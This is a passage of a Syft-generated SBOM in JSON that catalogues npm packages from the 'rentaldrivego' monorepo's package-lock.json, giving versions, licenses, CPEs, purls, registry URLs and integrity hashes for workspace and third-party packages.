.1"}}},{"id":"2a2c690594e77e74","name":"@rentaldrivego/admin","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/admin:\\@rentaldrivego\\/admin:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/admin@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"","integrity":"","dependencies":{"@rentaldrivego/types":"*","autoprefixer":"^10.4.19","dayjs":"^1.11.11","lucide-react":"^0.376.0","next":"14.2.3","postcss":"^8.4.38","react":"^18.3.1","react-dom":"^18.3.1","recharts":"^2.12.7","tailwindcss":"^3.4.3","zod":"^3.23.0"}}},{"id":"22655bafcebdfea4","name":"@rentaldrivego/admin","version":"UNKNOWN","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/admin:\\@rentaldrivego\\/admin:*:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/admin","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"apps/admin","integrity":"","dependencies":null}},{"id":"51dda2f8a6d52783","name":"@rentaldrivego/api","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/api:\\@rentaldrivego\\/api:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/api@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"","integrity":"","dependencies":{"@react-pdf/renderer":"^3.4.3","@rentaldrivego/database":"*","@rentaldrivego/types":"*","bcryptjs":"^2.4.3","cors":"^2.8.5","dayjs":"^1.11.11","express":"^4.19.2","express-rate-limit":"^8.5.1","firebase-admin":"^12.1.0","helmet":"^7.1.0","ioredis":"^5.3.2","jsonwebtoken":"^9.0.2","morgan":"^1.10.0","multer":"^1.4.5-lts.1","node-cron":"^3.0.3","nodemailer":"^6.9.16","otplib":"^12.0.1","qrcode":"^1.5.3","react":"^18.3.1","react-dom":"^18.3.1","resend":"^3.2.0","socket.io":"^4.7.5","twilio":"^5.1.0","zod":"^3.23.0"}}},{"id":"731fc15901c69a78","name":"@rentaldrivego/api","version":"UNKNOWN","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/api:\\@rentaldrivego\\/api:*:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/api","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"apps/api","integrity":"","dependencies":null}},{"id":"fb550e5d7052cd7e","name":"@rentaldrivego/dashboard","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/dashboard:\\@rentaldrivego\\/dashboard:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/dashboard@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"","integrity":"","dependencies":{"@rentaldrivego/types":"*","autoprefixer":"^10.4.19","dayjs":"^1.11.11","lucide-react":"^0.376.0","next":"14.2.3","postcss":"^8.4.38","react":"^18.3.1","react-dom":"^18.3.1","recharts":"^2.12.7","sharp":"^0.34.5","socket.io-client":"^4.7.5","tailwindcss":"^3.4.3","zod":"^3.23.0"}}},{"id":"8302af283dd2fb59","name":"@rentaldrivego/dashboard","version":"UNKNOWN","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/dashboard:\\@rentaldrivego\\/dashboard:*:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/dashboard","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"apps/dashboard","integrity":"","dependencies":null}},{"id":"bd8906fc40f841ac","name":"@rentaldrivego/database","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/database:\\@rentaldrivego\\/database:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/database@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"","integrity":"","dependencies":{"@prisma/client":"^5.13.0"}}},{"id":"2bdca263d566c09a","name":"@rentaldrivego/database","version":"UNKNOWN","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/database:\\@rentaldrivego\\/database:*:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/database","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"packages/database","integrity":"","dependencies":null}},{"id":"71e9d3c366707710","name":"@rentaldrivego/marketplace","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/marketplace:\\@rentaldrivego\\/marketplace:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/marketplace@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"","integrity":"","dependencies":{"@rentaldrivego/types":"*","autoprefixer":"^10.4.19","dayjs":"^1.11.11","lucide-react":"^0.376.0","next":"14.2.3","postcss":"^8.4.38","react":"^18.3.1","react-dom":"^18.3.1","tailwindcss":"^3.4.3","zod":"^3.23.0"}}},{"id":"999e66650845f9f4","name":"@rentaldrivego/marketplace","version":"UNKNOWN","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/marketplace:\\@rentaldrivego\\/marketplace:*:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/marketplace","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"apps/marketplace","integrity":"","dependencies":null}},{"id":"f54f88caa8e97b5c","name":"@rentaldrivego/public-site","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/public-site:\\@rentaldrivego\\/public-site:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/public-site:\\@rentaldrivego\\/public_site:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/public_site:\\@rentaldrivego\\/public-site:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/public_site:\\@rentaldrivego\\/public_site:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/public:\\@rentaldrivego\\/public-site:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/public:\\@rentaldrivego\\/public_site:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/public-site@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"","integrity":"","dependencies":{"@rentaldrivego/types":"*","autoprefixer":"^10.4.19","dayjs":"^1.11.11","lucide-react":"^0.376.0","next":"14.2.3","postcss":"^8.4.38","react":"^18.3.1","react-dom":"^18.3.1","tailwindcss":"^3.4.3","zod":"^3.23.0"}}},{"id":"ba9eab15fb9d9b6f","name":"@rentaldrivego/types","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/types:\\@rentaldrivego\\/types:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/types@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"","integrity":"","dependencies":null}},{"id":"f26df386702211f3","name":"@rentaldrivego/types","version":"UNKNOWN","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@rentaldrivego\\/types:\\@rentaldrivego\\/types:*:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40rentaldrivego/types","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"packages/types","integrity":"","dependencies":null}},{"id":"264d7bf353437253","name":"@selderee/plugin-htmlparser2","version":"0.11.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@selderee\\/plugin-htmlparser2:\\@selderee\\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@selderee\\/plugin-htmlparser2:\\@selderee\\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@selderee\\/plugin_htmlparser2:\\@selderee\\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@selderee\\/plugin_htmlparser2:\\@selderee\\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@selderee\\/plugin:\\@selderee\\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@selderee\\/plugin:\\@selderee\\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40selderee/plugin-htmlparser2@0.11.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@selderee/plugin-htmlparser2/-/plugin-htmlparser2-0.11.0.tgz","integrity":"sha512-P33hHGdldxGabLFjPPpaTxVolMrzrcegejx+0GxjrIb9Zv48D8yAIA/QTDR2dFl7Uz7urX8aX6+5bCZslr+gWQ==","dependencies":{"domhandler":"^5.0.3","selderee":"^0.11.0"}}},{"id":"32ce324a035d4e3a","name":"@socket.io/component-emitter","version":"3.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@socket.io\\/component-emitter:\\@socket.io\\/component-emitter:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@socket.io\\/component-emitter:\\@socket.io\\/component_emitter:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@socket.io\\/component_emitter:\\@socket.io\\/component-emitter:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@socket.io\\/component_emitter:\\@socket.io\\/component_emitter:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@socket.io\\/component:\\@socket.io\\/component-emitter:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@socket.io\\/component:\\@socket.io\\/component_emitter:3.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40socket.io/component-emitter@3.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@socket.io/component-emitter/-/component-emitter-3.1.2.tgz","integrity":"sha512-9BCxFwvbGg/RsZK9tjXd8s4UcwR0MWeFQ1XEKIQVVvAGJyINdrqKMcTRyLoK8Rse1GjzLV9cwjWV1olXRWEXVA==","dependencies":null}},{"id":"d1ab0047814562a3","name":"@swc/counter","version":"0.1.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@swc\\/counter:\\@swc\\/counter:0.1.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40swc/counter@0.1.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@swc/counter/-/counter-0.1.3.tgz","integrity":"sha512-e2BR4lsJkkRlKZ/qCHPw9ZaSxc0MVUd7gtbtaB7aMvHeJVYe8sOB8DBZkP2DtISHGSku9sCK6T6cnY0CtXrOCQ==","dependencies":null}},{"id":"f2d04f064acf1b61","name":"@swc/helpers","version":"0.5.21","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@swc\\/helpers:\\@swc\\/helpers:0.5.21:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40swc/helpers@0.5.21","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.21.tgz","integrity":"sha512-jI/VAmtdjB/RnI8GTnokyX7Ug8c+g+ffD6QRLa6XQewtnGyukKkKSk3wLTM3b5cjt1jNh9x0jfVlagdN2gDKQg==","dependencies":{"tslib":"^2.8.0"}}},{"id":"72bc47189d44cca0","name":"@swc/helpers","version":"0.5.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@swc\\/helpers:\\@swc\\/helpers:0.5.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40swc/helpers@0.5.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.5.tgz","integrity":"sha512-KGYxvIOXcceOAbEk4bi/dVLEK9z8sZ0uBB3Il5b1rhfClSpcX0yfRO0KmTkqR2cnQDymwLB+25ZyMzICg/cm/A==","dependencies":{"@swc/counter":"^0.1.3","tslib":"^2.4.0"}}},{"id":"a7bdaefe075a54be","name":"@tootallnate/once","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@tootallnate\\/once:\\@tootallnate\\/once:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40tootallnate/once@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@tootallnate/once/-/once-2.0.0.tgz","integrity":"sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A==","dependencies":null}},{"id":"7578f19b88adc968","name":"@types/caseless","version":"0.12.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/caseless:\\@types\\/caseless:0.12.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/caseless@0.12.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/caseless/-/caseless-0.12.5.tgz","integrity":"sha512-hWtVTC2q7hc7xZ/RLbxapMvDMgUnDvKvMOpKal4DrMyfGBUfB1oKaZlIRr6mJL+If3bAP6sV/QneGzF6tJjZDg==","dependencies":null}},{"id":"8b6775e086bda391","name":"@types/cors","version":"2.8.19","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/cors:\\@types\\/cors:2.8.19:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/cors@2.8.19","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/cors/-/cors-2.8.19.tgz","integrity":"sha512-mFNylyeyqN93lfe/9CSxOGREz8cpzAhH+E93xJ4xWQf62V8sQ/24reV2nyzUWM6H6Xji+GGHpkbLe7pVoUEskg==","dependencies":{"@types/node":"*"}}},{"id":"59c0361f7de521dd","name":"@types/d3-array","version":"3.2.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/d3-array:\\@types\\/d3-array:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3-array:\\@types\\/d3_array:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_array:\\@types\\/d3-array:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_array:\\@types\\/d3_array:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-array:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_array:3.2.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/d3-array@3.2.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/d3-array/-/d3-array-3.2.2.tgz","integrity":"sha512-hOLWVbm7uRza0BYXpIIW5pxfrKe0W+D5lrFiAEYR+pb6w3N2SwSMaJbXdUfSEv+dT4MfHBLtn5js0LAWaO6otw==","dependencies":null}},{"id":"ad88e8187765d8aa","name":"@types/d3-color","version":"3.1.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/d3-color:\\@types\\/d3-color:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3-color:\\@types\\/d3_color:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_color:\\@types\\/d3-color:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_color:\\@types\\/d3_color:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-color:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_color:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/d3-color@3.1.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/d3-color/-/d3-color-3.1.3.tgz","integrity":"sha512-iO90scth9WAbmgv7ogoq57O9YpKmFBbmoEoCHDB2xMBY0+/KVrqAaCDyCE16dUspeOvIxFFRI+0sEtqDqy2b4A==","dependencies":null}},{"id":"df6234ea1d1790c8","name":"@types/d3-ease","version":"3.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/d3-ease:\\@types\\/d3-ease:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3-ease:\\@types\\/d3_ease:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_ease:\\@types\\/d3-ease:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_ease:\\@types\\/d3_ease:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-ease:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_ease:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/d3-ease@3.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/d3-ease/-/d3-ease-3.0.2.tgz","integrity":"sha512-NcV1JjO5oDzoK26oMzbILE6HW7uVXOHLQvHshBUW4UMdZGfiY6v5BeQwh9a9tCzv+CeefZQHJt5SRgK154RtiA==","dependencies":null}},{"id":"d2cfc65d37d7fda7","name":"@types/d3-interpolate","version":"3.0.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/d3-interpolate:\\@types\\/d3-interpolate:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3-interpolate:\\@types\\/d3_interpolate:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_interpolate:\\@types\\/d3-interpolate:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_interpolate:\\@types\\/d3_interpolate:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-interpolate:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_interpolate:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/d3-interpolate@3.0.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/d3-interpolate/-/d3-interpolate-3.0.4.tgz","integrity":"sha512-mgLPETlrpVV1YRJIglr4Ez47g7Yxjl1lj7YKsiMCb27VJH9W8NVM6Bb9d8kkpG/uAQS5AmbA48q2IAolKKo1MA==","dependencies":{"@types/d3-color":"*"}}},{"id":"0128eed2457b60d1","name":"@types/d3-path","version":"3.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/d3-path:\\@types\\/d3-path:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3-path:\\@types\\/d3_path:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_path:\\@types\\/d3-path:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_path:\\@types\\/d3_path:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-path:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_path:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/d3-path@3.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/d3-path/-/d3-path-3.1.1.tgz","integrity":"sha512-VMZBYyQvbGmWyWVea0EHs/BwLgxc+MKi1zLDCONksozI4YJMcTt8ZEuIR4Sb1MMTE8MMW49v0IwI5+b7RmfWlg==","dependencies":null}},{"id":"6f0b81bc9d69ce92","name":"@types/d3-scale","version":"4.0.9","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/d3-scale:\\@types\\/d3-scale:4.0.9:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3-scale:\\@types\\/d3_scale:4.0.9:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_scale:\\@types\\/d3-scale:4.0.9:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_scale:\\@types\\/d3_scale:4.0.9:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-scale:4.0.9:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_scale:4.0.9:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/d3-scale@4.0.9","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/d3-scale/-/d3-scale-4.0.9.tgz","integrity":"sha512-dLmtwB8zkAeO/juAMfnV+sItKjlsw2lKdZVVy6LRr0cBmegxSABiLEpGVmSJJ8O08i4+sGR6qQtb6WtuwJdvVw==","dependencies":{"@types/d3-time":"*"}}},{"id":"533995aeaf2ae857","name":"@types/d3-shape","version":"3.1.8","type":"npm","foundBy